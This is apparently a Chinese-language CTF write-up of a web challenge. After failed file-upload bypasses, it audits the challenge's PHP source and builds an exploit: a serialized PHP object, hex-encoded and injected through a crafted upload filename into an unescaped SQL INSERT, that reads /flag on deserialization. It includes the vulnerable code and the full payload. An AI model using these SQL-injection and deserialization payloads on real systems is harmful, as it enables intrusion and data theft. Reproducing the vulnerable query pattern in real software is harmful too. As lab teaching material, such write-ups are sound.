传传传,各种传

*1*|***1*** 文件上传

1.MIME 类型检测绕过
设置为 image/jpeg,无果

2. 黑名单绕过
尝试设置后缀如 php3,php5, 无果

3.%00 截断
尝试,无果。

4. 应用程序解析绕过

.php.jpg。上传成功!

img

发现怎么后缀是 jpg,然后通过路径访问的话报 404,这里我就开始奇怪了,难道真的不是文件上传,毕竟就算上传成功也需要爆出路径才能利用,但是这明显是假路径。

思考其他的方向,既然 buu 给了 github 源码,那就看看源码吧,看了看,主要逻辑代码在 helper.php

*1*|***2*** 代码审计

<?php
class helper {
    protected $folder = "pic/";
    protected $ifview = False;
    protected $config = "config.txt";
    // The function is not yet perfect, it is not open yet.

    public function upload($input="file")
    {
        $fileinfo = $this->getfile($input);
        $array = array();
        $array["title"] = $fileinfo['title'];
        $array["filename"] = $fileinfo['filename'];
        $array["ext"] = $fileinfo['ext'];
        $array["path"] = $fileinfo['path'];
        $img_ext = getimagesize($_FILES[$input]["tmp_name"]);
        $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
        $array["attr"] = serialize($my_ext);
        $id = $this->save($array);
        if ($id == 0){
            die("Something wrong!");
        }
        echo "<br>";
        echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
    }

    public function getfile($input)
    {
        if(isset($input)){
            $rs = $this->check($_FILES[$input]);
        }
        return $rs;
    }

    public function check($info)
    {
        $basename = substr(md5(time().uniqid()),9,16);
        $filename = $info["name"];
        $ext = substr(strrchr($filename, '.'), 1);
        $cate_exts = array("jpg","gif","png","jpeg");
        if(!in_array($ext,$cate_exts)){
            die("<p>Please upload the correct image file!!!</p>");
        }
        $title = str_replace(".".$ext,'',$filename);
        return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
    }

    public function save($data)
    {
        if(!$data || !is_array($data)){
            die("Something wrong!");
        }
        $id = $this->insert_array($data);
        return $id;
    }

    public function insert_array($data)
    {
        $con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
        if (mysqli_connect_errno($con))
        {
            die("Connect MySQL Fail:".mysqli_connect_error());
        }
        $sql_fields = array();
        $sql_val = array();
        foreach($data as $key=>$value){
            $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
            $value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
            $sql_fields[] = "`".$key_temp."`";
            $sql_val[] = "'".$value_temp."'";
        }
        $sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
        mysqli_query($con, $sql);
        $id = mysqli_insert_id($con);
        mysqli_close($con);
        return $id;
    }

    public function view_files($path){
        if ($this->ifview == False){
            return False;
            //The function is not yet perfect, it is not open yet.
        }
        $content = file_get_contents($path);
        echo $content;
    }

    function __destruct(){
        # Read some config html
        $this->view_files($this->config);
    }
}

?>

这里懂了两个文件的内容
upload.php:
上传页面,包括了 helper.php ,序列化图片的内容并存在数据库中。

helper.php:
反序列化数据库中的内容,输出图片内容

所以我们的核心思路:
将危险代码通过序列化存在数据库中,在反序列化的过程后,通过某些函数执行危险代码

这里一定可以存入数据库,否则我们在前端无法利用,所以数据库的语句一定有漏洞,只要想好怎么利用就可以

大概看看代码,在 view_files 函数里存在文件读取,那么就按照他的来,

构造 ifview==True,content=/flag

*1*|***3*** 编写 exp

<?php
class helper {
    protected $ifview = True;
    protected $config = "/flag";

}
$a = new helper();
echo serialize($a);

?>

序列化得出
O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}

因为两个属性是 public,所以字段名前面加上 \0*\0 的前缀

*1*|***4***sql 注入

然后思路是想看到 sql 语句,其中应该可以插入危险代码,导致 sql 注入。那么我们先找到 SQL 语句:

INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")

追溯函数:

  1. implode(",",$sql_fields:
    用逗号组合 sql_fields
  2. $sql_fields[] = " “.$key_temp.” ";
    反引号中间包含 str_replace (chr (0).’*’.chr (0), ‘\0\0\0’, $key);
  3. $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
    替换后的 key

4. foreach($data as $key=>$value)
data 的键数组

看看 pop 链:
insert_array->save->upload

最终也就是 array 数组中的内容,即是我们上传的图片的各项参数。那我们能控制的也就是图片的图片名,然后发现 title 就是去掉后缀的 filename。看到 check 函数返回的内容就懂了。

return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);

我们按照此格式上传刚刚序列化后的内容,该代码先经过序列化,然后存入数据库中,后端将其从数据库中取出,反序列化,触发析构函数,读取 flag 内容

然后看到代码中在序列化和反序列化时对 protected 属性进行了过滤,所以我们不能直接传入 \0*\0 的前缀。需要按照他的传入 \0\0\0,经过处理后我们为需要的内容。

O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

因为不能使用双引号,所以我们 hex。

构造文件名:
filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"

(需要用 #注释掉后面的内容,当然不用 #注释,按照他的格式再往后核实也可以)

burpsuite 抓包,先传一个图片,更改内容为上面的值,上传成功,访问 show.php,获取 flag

*1*|***5*** 总结思路

  • 源码泄露,获得源码
  • 代码审计,一个序列化传进数据库,一个反序列化从数据库取出
  • 构造危险代码 -> 匹配成功传入数据库 -> 反序列化出内容 -> 通过相关函数获取 flag

*1*|***6*** 知识点

  • 信息泄露
  • sql 注入
  • 反序列化